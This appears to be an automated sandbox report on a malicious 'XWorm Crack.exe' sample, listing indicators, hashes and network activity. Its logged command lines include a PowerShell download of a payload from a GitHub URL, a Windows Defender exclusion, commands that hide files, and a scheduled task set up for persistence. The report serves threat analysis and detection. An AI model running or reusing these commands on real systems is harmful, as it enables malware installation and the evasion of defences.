File name:

XWorm Crack.exe

Full analysis: https://app.any.run/tasks/4d472913-e56f-4d71-a0b5-44e46fb1055f
Verdict: Malicious activity
Analysis date: May 17, 2025, 04:54:09
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
pastebin
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

7E1F59B346389C8DDE72670D941ACEB4

SHA1:

D4FB968136618C58BE9992370329777A54C7136F

SHA256:

1754EC70105B7E863D303D2256D836DB26DE03A63336A872AAC963ED0929D7B8

SSDEEP:

98304:RCYzBj4DbSb4Y6ZhkDQet54nHZUj0vU9XLDbenkuA83wpYp2twldaQ0EACheua5o:qp2z881mwH/kit496ikY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8092)
      • powershell.exe (PID: 7440)

    • Changes Windows Defender settings

      • cmd.exe (PID: 8016)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 8016)

    • Uses Task Scheduler to run other applications

      • RuntimeBroker.exe (PID: 1020)

    • Create files in the Startup directory

      • RuntimeBroker.exe (PID: 1020)

  • SUSPICIOUS

    • Application launched itself

      • XWorm Crack.exe (PID: 7320)

    • Executable content was dropped or overwritten

      • XWorm Crack.exe (PID: 7320)
      • powershell.exe (PID: 1056)
      • RuntimeBroker.exe (PID: 1020)

    • The process drops C-runtime libraries

      • XWorm Crack.exe (PID: 7320)

    • Process drops python dynamic module

      • XWorm Crack.exe (PID: 7320)

    • Process drops legitimate windows executable

      • XWorm Crack.exe (PID: 7320)

    • Starts CMD.EXE for commands execution

      • XWorm Crack.exe (PID: 7352)
      • wscript.exe (PID: 7896)

    • Loads Python modules

      • XWorm Crack.exe (PID: 7352)

    • Executing commands from a ".bat" file

      • XWorm Crack.exe (PID: 7352)
      • wscript.exe (PID: 7896)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7380)
      • cmd.exe (PID: 8016)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7380)
      • cmd.exe (PID: 8016)

    • The process executes VB scripts

      • cmd.exe (PID: 7380)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7896)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 8016)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 8016)

    • The executable file from the user directory is run by the CMD process

      • RuntimeBroker.exe (PID: 1020)

    • Reads the date of Windows installation

      • RuntimeBroker.exe (PID: 1020)

    • The process creates files with name similar to system file names

      • RuntimeBroker.exe (PID: 1020)

    • Reads security settings of Internet Explorer

      • RuntimeBroker.exe (PID: 1020)

    • Connects to unusual port

      • RuntimeBroker.exe (PID: 1020)

    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2196)

    • The process executes via Task Scheduler

      • svhost.exe (PID: 7872)

  • INFO

    • Create files in a temporary directory

      • XWorm Crack.exe (PID: 7320)
      • XWorm Crack.exe (PID: 7352)

    • Checks supported languages

      • XWorm Crack.exe (PID: 7320)
      • XWorm Crack.exe (PID: 7352)
      • RuntimeBroker.exe (PID: 1020)
      • svhost.exe (PID: 7872)

    • The sample compiled with english language support

      • XWorm Crack.exe (PID: 7320)

    • Reads the computer name

      • XWorm Crack.exe (PID: 7320)
      • XWorm Crack.exe (PID: 7352)
      • RuntimeBroker.exe (PID: 1020)
      • svhost.exe (PID: 7872)

    • Checks proxy server information

      • XWorm Crack.exe (PID: 7352)
      • powershell.exe (PID: 1056)
      • RuntimeBroker.exe (PID: 1020)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7216)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7216)

    • Disables trace logs

      • powershell.exe (PID: 1056)
      • RuntimeBroker.exe (PID: 1020)

    • Process checks computer location settings

      • RuntimeBroker.exe (PID: 1020)

    • Creates files or folders in the user directory

      • RuntimeBroker.exe (PID: 1020)

    • Reads Environment values

      • RuntimeBroker.exe (PID: 1020)

    • Reads the software policy settings

      • RuntimeBroker.exe (PID: 1020)
      • slui.exe (PID: 7572)

    • Reads the machine GUID from the registry

      • RuntimeBroker.exe (PID: 1020)
      • svhost.exe (PID: 7872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:17 04:50:08+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 173568
InitializedDataSize: 145408
UninitializedDataSize: -
EntryPoint: 0xce30
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
151
Monitored processes
23
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start xworm crack.exe xworm crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs sppextcomobj.exe no specs slui.exe cacls.exe no specs wscript.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe attrib.exe no specs schtasks.exe no specs conhost.exe no specs svchost.exe svhost.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1020RuntimeBroker.exe C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Description:
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\anon\runtimebroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1056Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
1180attrib +h "C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe" /s /dC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2284"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\admin\AppData\Roaming\svhost.exe"C:\Windows\System32\schtasks.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4776\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5408"C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system"C:\Windows\System32\cacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Control ACLs Program
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
6240attrib +h "Anon" /s /dC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
7216powershell.exe -command "Add-MpPreference -ExclusionPath "C:\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7320"C:\Users\admin\AppData\Local\Temp\XWorm Crack.exe" C:\Users\admin\AppData\Local\Temp\XWorm Crack.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\xworm crack.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
Total events
24 247
Read events
24 246
Write events
1
Delete events
0

Modification events

(PID) Process:(7380) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
Executable files
57
Suspicious files
3
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\_decimal.pydexecutable
MD5:21FCB8E3D4310346A5DC1A216E7E23CA
SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\api-ms-win-core-debug-l1-1-0.dllexecutable
MD5:226A5983AE2CBBF0C1BDA85D65948ABC
SHA256:591358EB4D1531E9563EE0813E4301C552CE364C912CE684D16576EABF195DC3
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\VCRUNTIME140.dllexecutable
MD5:32DA96115C9D783A0769312C0482A62D
SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\_hashlib.pydexecutable
MD5:3E540EF568215561590DF215801B0F59
SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\_ssl.pydexecutable
MD5:689F1ABAC772C9E4C2D3BAD3758CB398
SHA256:D3A89AA7E4A1DF1151632A8A5CAF338C4DDDB674EC093BFDBC122ADC9DB28A97
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\api-ms-win-core-datetime-l1-1-0.dllexecutable
MD5:8F8EB9CB9E78E3A611BC8ACAEC4399CB
SHA256:1BD81DFD19204B44662510D9054852FB77C9F25C1088D647881C9B976CC16818
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\_socket.pydexecutable
MD5:566CB4D39B700C19DBD7175BD4F2B649
SHA256:77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\api-ms-win-core-file-l1-2-0.dllexecutable
MD5:CC228FF8D86B608E73026B1E9960B2F8
SHA256:4CADBC0C39DA7C6722206FDCEBD670ABE5B8D261E7B041DD94F9397A89D1990D
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\api-ms-win-core-errorhandling-l1-1-0.dllexecutable
MD5:C2F8C03ECCE9941492BFBE4B82F7D2D5
SHA256:D56CE7B1CD76108AD6C137326EC694A14C99D48C3D7B0ACE8C3FF4D9BCEE3CE8
7320XWorm Crack.exeC:\Users\admin\AppData\Local\Temp\_MEI73202\api-ms-win-core-file-l1-1-0.dllexecutable
MD5:9F45A47EBFD9D0629F4935764243DD5A
SHA256:1CA895ABA4E7435563A6B43E85EBA67A0F8C74AA6A6A94D0FC48FA35535E2585
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
29
DNS requests
19
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.20.245.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.20.245.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7460
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7460
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2.20.245.137:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.20.245.137:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
23.219.150.101:80
www.microsoft.com
AKAMAI-AS
CL
whitelisted
5496
MoUsoCoreWorker.exe
23.219.150.101:80
www.microsoft.com
AKAMAI-AS
CL
whitelisted
7352
XWorm Crack.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
7352
XWorm Crack.exe
185.199.111.133:443
objects.githubusercontent.com
FASTLY
US
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.31.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.186.46
whitelisted
crl.microsoft.com
  • 2.20.245.137
  • 2.20.245.139
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
github.com
  • 140.82.121.4
whitelisted
objects.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.110.133
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.31.2
  • 40.126.31.1
  • 40.126.31.130
  • 40.126.31.73
  • 20.190.159.129
  • 40.126.31.0
  • 20.190.159.130
  • 20.190.159.68
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
pastebin.com
  • 172.67.25.94
  • 104.22.68.199
  • 104.22.69.199
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
2196
svchost.exe
Potential Corporate Privacy Violation
ET INFO DNS Query to a Reverse Proxy Service Observed
2196
svchost.exe
Misc activity
ET INFO DNS Query for Port Mapping/Tunneling Service Domain (.portmap .io)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
XWorm Crack.exe